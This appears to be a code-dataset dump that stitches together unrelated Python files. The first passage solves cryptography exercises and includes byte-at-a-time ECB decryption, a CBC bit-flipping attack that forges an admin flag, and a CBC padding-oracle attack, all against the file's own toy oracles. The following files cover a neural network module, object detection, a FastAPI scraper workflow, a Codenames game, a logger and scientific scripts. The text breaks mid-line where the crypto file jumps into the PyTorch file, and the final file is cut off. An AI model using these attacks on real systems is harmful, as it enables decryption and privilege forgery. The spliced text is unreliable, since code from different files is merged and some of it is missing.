from_b64=False)\n modtext = modtext + prev_block\n return modtext\n\n elif action == \"decrypt\":\n for group in grouper(text, 
keysize):\n filtered_group = bytes([0 if i is None else i for i in group])\n # Decrypt the current block\n temp_block = aes_128_in_ecb_mode(filtered_group, key, \"decrypt\", from_b64=False)\n # If we're on the first block, XOR against IV; else, XOR against prev_block\n if not prev_block:\n plain_block = xor_two_buffers_mod(temp_block, iv)\n else:\n plain_block = xor_two_buffers_mod(temp_block, prev_block)\n modtext = modtext + plain_block\n prev_block = filtered_group\n return modtext\n\n else:\n return\n\n\ndef random_length_bytes():\n \"\"\" Generates a random sequence of bytes, with a random length between 1 and 25 \"\"\"\n return bytes([randint(0,255) for i in range(0, randint(1,25))])\n\n\ndef random_aes_key():\n \"\"\" Generates a random AES key (16 bytes in length) \"\"\"\n return bytes([randint(0,255) for i in range(0, 16)])\n\n\ndef encryption_oracle(instring):\n \"\"\"\n Encrypts `instring` using either ECB or CBC (choosing between the two at random).\n \"\"\"\n instring = bytes(instring, \"utf-8\")\n encrypted = \"\"\n blocksize = 16\n iv = blocksize * b'\\x00'\n key = random_aes_key()\n\n # We want to prepend 5-10 random bytes and appends 5-10 random bytes\n to_prepend = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n to_append = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n\n # We'll need to pad instring s.t. len(to_prepend + instring + padding + to_append) % 16 == 0\n padding_amount = (blocksize - len(to_prepend + instring + to_append) % 16)\n instring = to_prepend + pkcs7_padding(instring, blocksize, padding_amount) + to_append\n instring = bytes(instring)\n\n if randint(0, 1) == 0:\n encrypted = (aes_128_in_ecb_mode(instring, key, \"encrypt\", from_b64=False), \"ECB\")\n else:\n encrypted = (cbc_mode(instring, key, iv, \"encrypt\", from_b64=False), \"CBC\")\n return encrypted\n\n\ndef detect_ecb_or_cbc(input):\n \"\"\"\n This is super-lazy and just assumes, if it's not ECB, must be CBC! It works\n for the purpose of the cryptochallenges (so far) but could be better :D;;;\n \"\"\"\n if detect_ecb(input):\n return \"ECB\"\n else:\n return \"CBC\"\n\n\n# TODO could probably squash this into something else\ndef magic_text_oracle(instring, key, magic_text, add_rand_chars=True, action=\"encrypt\"):\n \"\"\"\n Encrypts `instring` + `magic_text` using ECB mode and the given key.\n \"\"\"\n instring = instring + magic_text\n encrypted = \"\"\n blocksize = 16\n iv = blocksize * b'\\x00'\n\n if add_rand_chars:\n # We want to prepend 5-10 random bytes and appends 5-10 random bytes\n to_prepend = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n to_append = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n else:\n to_prepend = b''\n to_append = b''\n\n # We'll need to pad instring s.t. 
len(to_prepend + instring + padding + to_append) % 16 == 0\n padding_amount = (blocksize - len(to_prepend + instring + to_append) % 16)\n instring = to_prepend + pkcs7_padding(instring, blocksize, padding_amount) + to_append\n instring = bytes(instring)\n\n return aes_128_in_ecb_mode(instring, key, action, from_b64=False)\n\n\n# TODO this is done elsewhere, use this function there rather than the dupe\n# also this is wonky can't we just hand it encrypted text?\ndef detect_block_size(key):\n \"\"\"\n Detects the blocksize used for encryption.\n If it cannot be detected, or the blocksize is not between 4 and 256,\n returns None.\n \"\"\"\n for potential_blocksize in range(4, 256):\n test_str = bytes(\"\".join([chr(i) for i in [randint(65,90) for j in range(0, potential_blocksize)]]), \"utf-8\")\n crypted = magic_text_oracle(test_str*25, key, b'', add_rand_chars=False)\n sets = []\n for group in grouper(crypted, potential_blocksize):\n sets.append(group)\n if len(set(sets)) == 2:\n return potential_blocksize\n return None\n\n\ndef craft_input_block(target_size):\n \"\"\" Returns a bytestring of 'AAA...'s, with length target_size \"\"\"\n return b'A' * target_size\n\n\n# could probably better separate concerns\ndef decrypt_magic_text(magic_text, key):\n \"\"\" Decrypts magic_text using byte-at-a-time decryption \"\"\"\n magic_text = base64.b64decode(magic_text)\n block_size = detect_block_size(key) # is 16, but we compute anyway\n input_block = craft_input_block(block_size-1)\n inputs_dict = {}\n result = b''\n magic_size = len(magic_text)\n\n # craft the attack dictionary\n for j in range(256):\n new_input = input_block + bytes([j])\n new_input_result = magic_text_oracle(new_input, key, magic_text, add_rand_chars=False)\n inputs_dict[new_input_result[0:block_size]] = j\n\n for i in range(magic_size):\n this_magic = magic_text[i:magic_size]\n byte_short_result = magic_text_oracle(input_block, key, this_magic, add_rand_chars=False)[0:block_size]\n result = result + bytes(chr(inputs_dict[byte_short_result]), \"utf-8\")\n\n return result\n\ndef fetch(block_size, random_prepend, key):\n cached_size = None\n for i in range(0, block_size+1):\n crafted_input = b'A' * i\n if not cached_size:\n cached_size = len(magic_text_oracle(random_prepend + crafted_input, key, b'', add_rand_chars=False))\n else:\n temp = len(magic_text_oracle(random_prepend + crafted_input, key, b'', add_rand_chars=False))\n if (temp > (cached_size + 1)):\n pad_for_rand = b'A' * (i-1)\n assert(((len(random_prepend) + (len(pad_for_rand)+1)) % block_size) == 0)\n return pad_for_rand\n\ndef decrypt_magic_text_harder(magic_text, key, random_prepend):\n \"\"\"\n Decrypts magic_text using byte_at_a_time decryption, when random_prepend is \n being prepended to all calls\n \"\"\"\n magic_text = base64.b64decode(magic_text)\n block_size = detect_block_size(key) # is 16, but we compute anyway\n input_block = craft_input_block(block_size-1)\n inputs_dict = {}\n result = b''\n magic_size = len(magic_text)\n\n # We need to figure out the size of the random_prepend. We can probably\n # do this by figuring out at what point the block size \"jumps\"...\n # Suppose block size 8. 3 + 5 --> 8. 4 + 4 --> 8... 
8 + 1 --> 16!\n # So we need to find when block size \"jumps\" by n-1, where n is block size\\\n pad_for_rand = fetch(block_size, random_prepend, key)\n\n # Now we know that random_prepend + pad_for_rand gets us a nice block with one free byte at the end.\n # We can craft an attack dictionary based on this.\n size_to_slice = len(random_prepend) + len(pad_for_rand) + 1\n for j in range(256):\n # new_input is going to be random_prepend + pad_for_rand + a target byte\n new_input = random_prepend + pad_for_rand + bytes([j])\n new_input_result = magic_text_oracle(new_input, key, magic_text, add_rand_chars=False)\n inputs_dict[new_input_result[0:size_to_slice]] = j\n\n for i in range(magic_size):\n this_magic = magic_text[i:magic_size]\n byte_short_result = magic_text_oracle(random_prepend + pad_for_rand, key, this_magic, add_rand_chars=False)[0:size_to_slice]\n result = result + bytes(chr(inputs_dict[byte_short_result]), \"utf-8\")\n\n return result\n\n\ndef parse_kv(instring):\n # this is the silliest dictionary comprehension\n return {i[0]: i[1] for i in [j.split(\"=\") for j in [i for i in instring.split(\"&\")]]}\n\ndef profile_for(email):\n email = email.replace(\"&\", \"\\&\").replace(\"=\", \"\\=\")\n uid = 10 # being lazy :D;;;\n role = 'user'\n return (\"email=\" + email + \"&uid=\" + str(uid) + \"&role=\" + role)\n\ndef copypasta_attack():\n key = random_aes_key()\n my_plaintext = profile_for(\"julia@flowerhack.com\")\n my_encrypted_text = magic_text_oracle(bytes(my_plaintext, \"utf-8\"), key, b'', add_rand_chars=False)\n my_decrypted_text = magic_text_oracle(my_encrypted_text, key, b'', add_rand_chars=False, action=\"decrypt\")\n\n # only use user input for profile_for and ciphertexts to make an admin\n\ndef strip_padding(padded_string):\n \"\"\"\n Strips away the PKCS7 padding from a string and returns it. 
If padding is\n invalid, raises a PaddingException\n \"\"\"\n reversed_input = padded_string[::-1]\n # 01 is valid, 02 02 is valid, 03 03 03 is valid...\n for i in range(1, len(reversed_input)):\n if [val for val in reversed_input[0:i]] == [i for num in range(0,i)]:\n return padded_string[:-i]\n raise PaddingException\n\ndef insert_in_query_and_cbc_encrypt(inbytes, key):\n \"\"\" Inserts user input into the querystring provided in challenge 16 \"\"\"\n prepend = b'comment1=cooking%20MCs;userdata='\n append = b';comment2=%20like%20a%20pound%20of%20bacon'\n newbytes = (prepend + inbytes.replace(b';', b'\\;').replace(b'=', b'\\=') + append)\n paddedbytes = pkcs7_padding(newbytes, 16)\n crypted = cbc_mode(paddedbytes, key, b'\\x00', \"encrypt\", from_b64=False)\n return crypted\n\ndef find_admin_user_in_cbc_encrypted_text(inbytes, key):\n \"\"\"\n Takes a CBC encrypted byte object and sees if the decrypted result has an\n admin user\n \"\"\"\n decrypted = cbc_mode(inbytes, key, b'\\x00', \"decrypt\", from_b64=False)\n if b';admin=true' in decrypted:\n return True\n else:\n return False\n\ndef bitfip_attack(inbytes, key):\n \"\"\"\n Very narrowly focused on the attack in challenge 16.\n Could mod later to make reusable probs\n \"\"\"\n byte_pos_first = None\n byte_pos_second = None\n for i in range(0, 256):\n temp = cbc_mode(inbytes[0:37] + bytes([i]) + inbytes[38:], key, b'\\x00', \"decrypt\", from_b64=False)\n if b';admin' in temp:\n byte_pos_first = i\n for i in range(0, 256):\n temp = cbc_mode(inbytes[0:43] + bytes([i]) + inbytes[44:], key, b'\\x00', \"decrypt\", from_b64=False)\n if b'admin=' in temp:\n byte_pos_second = i\n return (inbytes[0:37] + bytes([byte_pos_first]) + inbytes[38:43] + bytes([byte_pos_second]) + inbytes[44:])\n\ndef cbc_crypt_random_line(infile, key, from_b64=False):\n random_line = bytes(choice(open(infile).readlines()), \"utf-8\")\n iv = b'\\x00'\n crypted = cbc_mode(pkcs7_padding(random_line, 16), key, iv, \"encrypt\", from_b64=from_b64)\n return (crypted, iv, random_line)\n\ndef cbc_padding_oracle(cyphertext, key, iv):\n decrypted = cbc_mode(cyphertext, key, iv, \"decrypt\", from_b64=False)\n try:\n strip_padding(decrypted)\n return True\n except PaddingException:\n return False\n\ndef attack_cbc(cyphertext, key, iv, ref):\n #last_cypherblock = cyphertext[-16:]\n #nextlast_cypherblock = cyphertext[-32:-16]\n # ASSUMING KEYSIZE=16 FOR LIKE EVERYTHING i am a terrible hardcoding person sorry\n # ASSUMING IV IS 0\n\n cyphertext = (iv*16) + cyphertext\n len_cyphertext = len(cyphertext)\n cur_spot = len_cyphertext\n final_plaintext = b''\n\n while (cur_spot-32) >= 0:\n last_cypherblock = cyphertext[cur_spot-16:cur_spot]\n nextlast_cypherblock = cyphertext[cur_spot-32:cur_spot-16]\n\n # initialize stuff for this cycle\n plaintext = bytearray(16)\n guessed_bytes = bytes(0)\n expected_byte = 1\n for position in reversed(range(16)):\n # We are currently decoding the plaintext that corresponds to last cypherblock.\n for i in range(0, 256):\n fake_cyphertext = bytes(position) + bytes([i]) + guessed_bytes + last_cypherblock\n if cbc_padding_oracle(fake_cyphertext, key, iv):\n # in this case we think i must be the value of th plaintext at that spot?\n #import pdb; pdb.set_trace()\n # that is, p = p'[16] ^ i/c'[16] ^ c[16]\n plaintext[position] = expected_byte ^ i ^ nextlast_cypherblock[position]\n expected_byte = expected_byte + 1\n guessed_bytes = bytes(0)\n for pos_to_guess in range(position, 16):\n guessed_bytes = guessed_bytes + bytes([expected_byte ^ 
plaintext[pos_to_guess] ^ nextlast_cypherblock[pos_to_guess]])\n final_plaintext = plaintext + final_plaintext\n cur_spot = cur_spot-16\n return final_plaintext\n\n# key = 'YELLOW SUBMARINE'\n# nonce = 0\n# format = 64 bit unsigned little endian nonce, \n# 64 bit little endian block count (byte count / 16)\n# nonce + counter: ENCRYPT WITH KEY, then XOR with plaintext\ndef ctr_stream(text, key, nonce):\n packnonce = struct.pack(' torch.Tensor:\n self.rnn.flatten_parameters()\n\n output, _ = self.rnn(x)\n return output\n \n def get_output_dim(self):\n return self.rnn.hidden_size*(1 + int(self.rnn.bidirectional))\n\nclass Seq2SeqVec_CNN(Seq2SeqVec):\n def __init__(self,\n input_size,\n hidden_size,\n kernel_size = 3,\n activation: str = 'tanh'\n ):\n super().__init__()\n\n if kernel_size % 2 != 1:\n raise RuntimeError(f'For Seq2SeqVec model, kernel_size ({kernel_size}) should be odd so that output has same length as input')\n \n self.cnn = nn.Conv1d(input_size, hidden_size, kernel_size,\n padding = (kernel_size - 1) // 2)\n self.act = ACT_MAPPING[activation]()\n \n def forward(self, x: torch.Tensor, *args, **kwargs) -> torch.Tensor:\n # x: (batch, seq_len, dim)\n cnn_out = self.cnn(torch.transpose(x, 2, 1))\n # (batch_size, hid_dim, seq_len)\n cnn_out = torch.transpose(cnn_out, 2, 1)\n cnn_out = self.act(cnn_out)\n return cnn_out\n\n\nclass Seq2SeqVec_CNNRNN(Seq2SeqVec_RNN):\n def __init__(self,\n rnn_type: str,\n input_size: int,\n hidden_size: int,\n num_layers: int,\n cnn_out_size: Optional[int] = None,\n kernel_size: int = 3,\n dropout: float = 0.,\n bidirectional: bool = True,\n activation: str = 'tanh'\n ):\n if cnn_out_size is None:\n cnn_out_size = hidden_size\n \n super().__init__(\n rnn_type, cnn_out_size, hidden_size, num_layers,\n dropout = dropout, bidirectional= bidirectional\n )\n \n if kernel_size % 2 != 1:\n raise RuntimeError(f'For Seq2SeqVec model, kernel_size ({kernel_size}) should be odd so that output has same length as input')\n self.cnn = nn.Conv1d(\n input_size,\n cnn_out_size,\n kernel_size = kernel_size,\n padding = (kernel_size - 1) // 2\n )\n self.cnn_act = ACT_MAPPING[activation]()\n \n def forward(self, x: torch.Tensor) -> torch.Tensor:\n self.rnn.flatten_parameters()\n\n cnn_out = self.cnn(torch.transpose(x, 2, 1))\n # (batch_size, hid_dim, seq_len)\n cnn_out = torch.transpose(cnn_out, 2, 1)\n cnn_out = self.cnn_act(cnn_out)\n\n output, (h_n, _) = self.rnn(cnn_out)\n\n return output\n\n\n# ------------\n# Sent2SeqVec models\n# ------------\nclass Sent2SeqVec_Emb(Sent2SeqVec):\n \"\"\"\n Embedding based Sent2SeqVec model\n forward(x)\n \"\"\"\n def __init__(self,\n vocab_size: int,\n emb_dim: int,\n seq2seqvec_name: str,\n seq2seqvec_args: dict\n ):\n super().__init__()\n\n self.emb = nn.Embedding(vocab_size, emb_dim)\n seq2seqvec_args['input_size'] = emb_dim\n self.seq2seqvec = Seq2SeqVec.from_name(seq2seqvec_name)(**seq2seqvec_args)\n \n def forward(self, x, *args, **kwargs):\n # to be compatible with bert\n return self.seq2seqvec(self.emb(x))\n \n def get_output_dim(self):\n return self.seq2seqvec.get_output_dim()\n\nclass Sent2SeqVec_Bert(Sent2SeqVec):\n \"\"\"\n Bert encoder.\n\n Load pretrained parameters from bert_path and support customized number of layers.\n\n forward(input_ids, attention_mask, token_type_ids)\n \"\"\"\n def __init__(self,\n bert_path: str,\n num_layers: int,\n bert_config: Optional[PretrainedConfig] = None,\n load_pretrain = True\n ):\n super().__init__()\n\n if bert_config is None:\n cfg_dt, cfg_kws = 
BertConfig.get_config_dict(bert_path)\n cfg_dt['num_hidden_layers'] = num_layers\n bert_config = BertConfig(**cfg_dt, **cfg_kws)\n \n self.bert = BertModel(bert_config)\n if load_pretrain:\n bert_pretrain = BertModel.from_pretrained(bert_path)\n self.bert.load_state_dict(bert_pretrain.state_dict(), strict = False)\n\n def forward(self, input_ids, attention_mask = None, token_type_ids = None):\n bert_out = self.bert(input_ids, attention_mask, token_type_ids)\n \n return bert_out[0] # change. only need the output sequence\n \n def get_output_dim(self):\n return self.bert.config.hidden_size \n","repo_name":"srhthu/deepnlp","sub_path":"deepnlp/nn_modules/seq2seqvec.py","file_name":"seq2seqvec.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25344667026","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 6 15:23:59 2020\n\n@author: spi112884\n\"\"\"\nfrom imageai.Detection.Custom import CustomObjectDetection\nimport os\n\narr = os.listdir('validation/images')\n\n\ndetector = CustomObjectDetection()\ndetector.setModelTypeAsYOLOv3()\ndetector.setModelPath(\"detection_model-ex-011--loss-0007.150.h5\")\ndetector.setJsonPath(\"json/detection_config.json\")\ndetector.loadModel()\n\nfor imagem in arr:\n print (imagem)\n detections = detector.detectObjectsFromImage(input_image='validation/images/'+imagem, output_image_path=imagem)\n for detection in detections:\n print(detection[\"name\"], \" : \", detection[\"percentage_probability\"], \" : \", detection[\"box_points\"])\n\n\n\n\n","repo_name":"julianoppca/Projeto_PPCA_2020","sub_path":"Deteccao de objetos/Possiveis drogas/detecta_em_imagens.py","file_name":"detecta_em_imagens.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70241493548","text":"# coding: utf-8\n\nimport ui\nimport random\n\nBG_CELL = (0.9, 0.9, 0.9, 1.0)\nBG_BOARD = (0.9, 0.85, 0.8, 1.0)\n\nclass Board (ui.View):\n\tdef __init__(self):\n\t\tself.width = 1024\n\t\tself.height = 700\n\t\t\n\t\tself.background_color = BG_BOARD\n\t\n\tdef add_cell(self, text, col, row, touch_handler):\n\t\tx_pos = ((self.width / 5) * col) - (self.width / 10)\n\t\ty_pos = ((self.height / 5) * row) - (self.height / 10)\n\t\t\n\t\tcell = Cell(text, x_pos, y_pos, touch_handler)\n\t\tself.add_subview(cell)\n\n\nclass Cell (ui.View):\n\tdef __init__(self, text, x, y, touch_handler):\n\t\t#self.multitouch_enabled = False\n\t\tself.is_clicked = False\n\t\t\n\t\tself.name = text\n\t\t\n\t\tself.background_color = BG_CELL\n\t\tself.border_width = 1.0\n\t\tself.border_color = 0.3\n\t\tself.width = 200\n\t\tself.height = 100\n\t\t#self.flex = 'WH'\n\t\tself.corner_radius = 5\n\t\t\n\t\tself.center = (x, y)\n\t\t\n\t\tlabel = ui.Label(name=text)\n\t\t#label.flex = 'LRT'\n\t\tlabel.font = ('', 24)\n\t\tlabel.text = text\n\t\tlabel.alignment = ui.ALIGN_CENTER\n\t\tlabel.size_to_fit()\n\t\tlabel.center = (self.width / 2, self.height / 2)\n\t\t#label.line_break_mode = ui.LB_CLIP\n\t\t#label.number_of_lines = 1\n\t\t\n\t\tself.add_subview(label)\n\t\tself.label = label\n\t\t\n\t\tself.touch_handler = touch_handler\n\t\tself.last_ended_time = 0\n\t\n\tdef touch_ended(self, touch):\n\t\t# touch ended outside view, ignore it\n\t\tif not 0 < touch.location[0] < self.width:\n\t\t\treturn\n\t\t\n\t\tif not 0 < touch.location[1] < self.height:\n\t\t\treturn\n\t\t\n\t\t# doubleclick checker\n\t\tif 
touch.timestamp - self.last_ended_time <= 0.2:\n\t\t\tfor subview in self.superview.subviews:\n\t\t\t\tsubview.background_color = BG_CELL\n\t\t\t\tsubview.label.text_color = 'black'\n\t\t\tself.superview.background_color = BG_BOARD\n\t\t\treturn\n\t\t\n\t\tself.last_ended_time = touch.timestamp\n\t\t\n\t\t# register as a proper click\n\t\tself.touch_handler(self)\n\t\n\tdef turn_red(self):\n\t\tself.background_color = (1.0, 0, 0, 1)\n\t\tself.label.text_color = 'white'\n\t\n\tdef turn_blue(self):\n\t\tself.background_color = (0, 0, 1.0, 1)\n\t\tself.label.text_color = 'white'\n\t\n\tdef turn_grey(self):\n\t\tself.background_color = (0.5, 0.5, 0.5, 1)\n\t\tself.label.text_color = 'white'\n\t\n\tdef turn_black(self):\n\t\tself.background_color = (0, 0, 0, 1)\n\t\tself.label.text_color = 'white'\n\n\ndef touch_handler(cell):\n\tglobal red_words, blue_words\n\tglobal red_revealed, blue_revealed\n\tif cell.name in red_words:\n\t\tcell.turn_red()\n\t\tred_revealed += 1\n\telif cell.name in blue_words:\n\t\tcell.turn_blue()\n\t\tblue_revealed += 1\n\telif cell.name in assassin:\n\t\tcell.turn_black()\n\telse:\n\t\tcell.turn_grey()\n\n\nWORDLIST = []\nwith open(\"wordlist.txt\", 'r') as f:\n\tWORDLIST = f.readlines()\n\nred_index = random.randint(8,9)\nblue_index = 17 - red_index\nwords = random.sample(WORDLIST, 25)\nassassin = words[0]\nred_words = words[1:red_index+1]\nblue_words = words[red_index+1:18]\nred_revealed = 0\nblue_revealed = 0\n\nv = Board()\n\nrandom.shuffle(words)\ncol = 1\nrow = 1\nfor word in words:\n\tv.add_cell(word, col, row, touch_handler)\n\tcol += 1\n\tif col == 6:\n\t\tcol = 1\n\t\trow += 1\n\nfor cell in v.subviews:\n\ttouch_handler(cell)\n\nif len(red_words) > len(blue_words):\n\tv.background_color = '#ffaaaa'\nelse:\n\tv.background_color = '#aac8ff'\n\n\nv.present('full_screen')\n","repo_name":"Kitryn/codenames-pythonista","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17539839321","text":"\nimport typing\nfrom typing import Optional\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom core.workflows.abstract_workflow import AbstractWorkflow\n\nclass InputProduct(BaseModel):\n product_name: str\n\nclass OutputProductReviews(BaseModel):\n spreadsheet_url: str\n\nclass AmazonReviewScraperWorkflow(AbstractWorkflow):\n def __init__(self) -> None:\n super().__init__()\n\n async def transform(\n self, args: InputProduct, callbacks: typing.Any\n ) -> OutputProductReviews:\n results_dict = await super().transform(args=args, callbacks=callbacks)\n spreadsheet_url = results_dict['spreadsheet_created'].spreadsheet_url\n out = OutputProductReviews(spreadsheet_url=spreadsheet_url)\n return out\n\nload_dotenv()\namazon_review_scraper_app = FastAPI()\n\n@amazon_review_scraper_app.post(\"/transform/\")\nasync def transform(\n args: InputProduct,\n) -> OutputProductReviews:\n amazon_review_scraper = AmazonReviewScraperWorkflow()\n return await amazon_review_scraper.transform(args, callbacks=None)\n\n","repo_name":"yeagerai/yWorkflows-AmazonReviewScraperWorkflow-by-Albert-Castellana-3600-b0d9731a","sub_path":"components/amazon_review_scraper_workflow/amazon_review_scraper_workflow.py","file_name":"amazon_review_scraper_workflow.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
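The FastAPI record above wires AmazonReviewScraperWorkflow to a single POST /transform/ route that accepts an InputProduct body and answers with an OutputProductReviews. A minimal client sketch follows, assuming the app is served locally on port 8000; the host, port, example product name, and the use of the requests library are illustrative assumptions, not part of the record:

import requests

# The request body must match the InputProduct schema (one field: product_name).
payload = {"product_name": "example product"}  # hypothetical product name

# POST to the /transform/ route exposed by amazon_review_scraper_app.
resp = requests.post("http://localhost:8000/transform/", json=payload)
resp.raise_for_status()

# The JSON response deserializes into the OutputProductReviews schema.
print(resp.json()["spreadsheet_url"])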
+{"seq_id":"32236826388","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport os\nimport logging\n\nfrom utils.constants import EXC_INFO_TYPE\n\n\nclass OneLineExceptionFormatter(logging.Formatter):\n def formatException(self, exc_info: EXC_INFO_TYPE) -> str:\n result = super().formatException(exc_info)\n return repr(result)\n\n def format(self, record: logging.LogRecord) -> str:\n # noinspection StrFormat\n result = super().format(record)\n if record.exc_text:\n result = result.replace('\\n', '')\n return result\n\n @classmethod\n def logger_initialisation(cls, debug: bool = False) -> None:\n debug_level: bool = debug and 'DEBUG' or 'INFO'\n handler: logging.StreamHandler = logging.StreamHandler()\n formatter: OneLineExceptionFormatter = cls(logging.BASIC_FORMAT)\n handler.setFormatter(formatter)\n root: logging.Logger = logging.getLogger()\n root.setLevel(os.environ.get('LOGLEVEL', debug_level))\n root.addHandler(handler)\n","repo_name":"jffin/urls_list_scanner","sub_path":"utils/logger_formatter.py","file_name":"logger_formatter.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35055693525","text":"# ***************************************************************\r\n# File : hbond_correlation.py \r\n# Used to calculate H-bond correlation functions S(t),C(t),Sd(t),Cd(t) \r\n\r\n# usage: python hbond_correltion.py [-h] f side atoms\r\n\r\n# positional arguments:\r\n# f Name of the trajectory file\r\n# side Size of the box\r\n# atoms Total number of atoms\r\n\r\n# optional arguments:\r\n# -h, --help show help message \r\n# ***************************************************************\r\n\r\nfrom itertools import islice,izip\r\nfrom hbond_pair import hbond,popvar\r\nfrom multiprocessing import Pool\r\nimport matplotlib.pyplot as plt\r\nimport argparse,time\r\nfrom math import log\r\n\r\n\r\ndef parse(): #function to parse command-line arguments \r\n parser = argparse.ArgumentParser(description='Hydrogen Bond Analysis')\r\n parser.add_argument(\"f\", type=str, help=\"Name of the trajectory file\")\r\n parser.add_argument(\"side\" ,type=float,help=\"Size of the box\")\r\n parser.add_argument(\"atoms\",type=int, help=\"Total number of atoms\")\r\n args=parser.parse_args() \r\n return [args.f, args.side, args.atoms]\r\n\r\n\r\ndef get_h(tmp): #process the frame and call fortran module \r\n tmp =[map(float,line.split()[3:6]) for line in tmp[:768]]\r\n return hbond(tmp,side)\r\n\r\n\r\ndef calculate(): #returns number of h-bond and their probability \r\n hframe=[]\r\n pl=Pool() #create a pool of worker processes\r\n with open(file) as f:\r\n while True:\r\n tmp=list(islice(f,9,9+atoms)) #read one time frame from file\r\n if not tmp: break\r\n hframe.append(pl.apply_async(get_h,[tmp])) #load the function call to a worker in parallel\r\n pl.close()\r\n pl.join()\r\n hframe=[i.get() for i in hframe]\r\n hframe,hdframe=zip(*hframe)\r\n shb,chb,shbd,chbd=popvar(hframe,hdframe)\r\n return shb,chb,shbd,chbd\r\n\r\nfile,side,atoms=parse()\r\n\r\ndef save(a,b,c): \t\t\t\t\t\t\t\t\t#save the data\r\n txt=\"\\n\".join(\"%s %s\"%(i,j) for i,j in zip(a,b))\r\n with open(c+\"_correlation.dat\",\"w\") as f:\r\n f.write(txt)\r\n\r\nif __name__ == '__main__':\r\n shb,chb,shbd,chbd=calculate()\r\n x=[i/1000.0 for i in xrange(len(shb))]\r\n save(x,shb,\"shb\")\r\n save(x,chb,\"chb\")\r\n save(x,shbd,\"shbd\")\r\n 
save(x,chbd,\"chbd\")","repo_name":"Koushikphy/Molecular-Dynamics","sub_path":"upload/hbond_correlation.py","file_name":"hbond_correlation.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34271488681","text":"from scipy.sparse import random\nimport numpy as np\nfrom qpsolvers import solve_qp\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\n\n## Problem 4.(4)\n# Define parameters\nn = 100 # nodes\nm = 10 # edges\n\nnp.random.seed(5615234)\nA = random(n, m, density=0.02).A # sparse matrix A\nfor i in range(n):\n for j in range(m):\n if A[i, j] > 0.5: # to call a ndarray type A, use A[0,0]\n A[i, j] = 1\n elif A[i, j] > 0:\n A[i, j] = -1\n\nnp.random.seed(2922963)\nx = random(m, 1, density=0.3).A\nnp.random.seed(2648157)\ny = random(m, 1, density=0.5).A\n\ns = A.dot(x)\nt = A.dot(y)\n\nsSumNonZero = (s!=0).sum() # check nonzero elements\ntSumNonZero = (t!=0).sum() # check nonzero elements\n\n# Check if x and y are feasible\n# Q, R = np.linalg.qr(A)\n# xf = np.linalg.inv(R).dot(Q.T.dot(s))\n# yf = np.linalg.inv(R).dot(Q.T.dot(t))\n\n# Define primal variables\nx = np.zeros((m, 1))\ny = np.zeros((m, 1))\n\n# Define dual variables\nlambda1 = np.zeros((n, 1))\nlambda2 = np.zeros((n, 1))\nmu1 = np.zeros((m, 1))\nmu2 = np.zeros((m, 1))\n\n# Dual decomposition\niterMax = 200\np = [] # primal optimal\nq = [] # dual optimal\n\n\n# Solution by scipy\ndef bi_commodity(n, m, ss, tt, aa):\n # Declare variables and parameters\n x = cp.Variable((m, 1))\n y = cp.Variable((m, 1))\n s = cp.Parameter((n, 1))\n s.value = ss\n t = cp.Parameter((n, 1))\n t.value = tt\n a = cp.Parameter((n, m))\n a.value = aa\n\n # Choose objective function\n obj = cp.Minimize(cp.sum((x + y) ** 2) + 0.1 * (sum(x ** 2) + sum(y ** 2)))\n\n # Declare constraints\n constraints = [a @ x == s,\n a @ y == t,\n x >= 0,\n y >= 0]\n\n # Solve\n prob = cp.Problem(obj, constraints)\n prob.solve()\n if (prob.status == 'optimal'):\n return prob.status, prob.value, x.value, y.value\n else:\n return prob.status, np.nan, np.nan, np.nan\n\n\nstatus, value, xx, yy = bi_commodity(n, m, s, t, A)\n\n\n# error_x = A.dot(xx) - s\n# error_y = A.dot(yy) - t\n\n\n# Define argmin F(x) for step 1 of distributed algorithm\ndef argminxy(delta1, delta2):\n P = np.array([[2.2, 2.], [2., 2.2]])\n q = np.array([[delta1, delta2]]).reshape((2,))\n G = np.array([[-1., 0.], [0., -1.]])\n h = np.array([0., 0.]).reshape((2,))\n\n # Solve QP\n x = solve_qp(P, q, G, h)\n # p = 1 / 2 * np.dot(np.dot(x, P), x) + np.dot(q, x)\n return x[0], x[1]\n\n\n# Dual decomposition\nfor i in range(iterMax):\n # Step 1: calculate x_min and y_min\n delta1 = A.transpose().dot(lambda1)\n delta2 = A.transpose().dot(lambda2)\n for j in range(m):\n x[j, 0], y[j, 0] = argminxy(delta1[j, 0], delta2[j, 0])\n\n # Step 2: calculate p and q\n lag = sum((x + y) ** 2) + 0.1 * sum(x ** 2 + y ** 2) \\\n + lambda1.transpose().dot(-s + A.dot(x)) + lambda2.transpose().dot(-t + A.dot(y))\n q = np.append(q, lag)\n f = sum((x + y) ** 2) + 0.1 * sum(x ** 2 + y ** 2)\n p = np.append(p, f)\n\n # Step 3: update dual variables with subgradient method\n alphak = 0.1 # step size\n lambda1 = lambda1 + alphak * (-s + A.dot(x))\n lambda2 = lambda2 + alphak * (-t + A.dot(y))\n\nplt.figure()\nplt.plot(np.arange(0, iterMax, 1), p)\nplt.xlabel('iteration')\nplt.ylabel('p')\nplt.title('Primal optimisation value versus iteration k')\nplt.show()\n\nplt.figure()\nplt.plot(np.arange(0, iterMax, 1), 
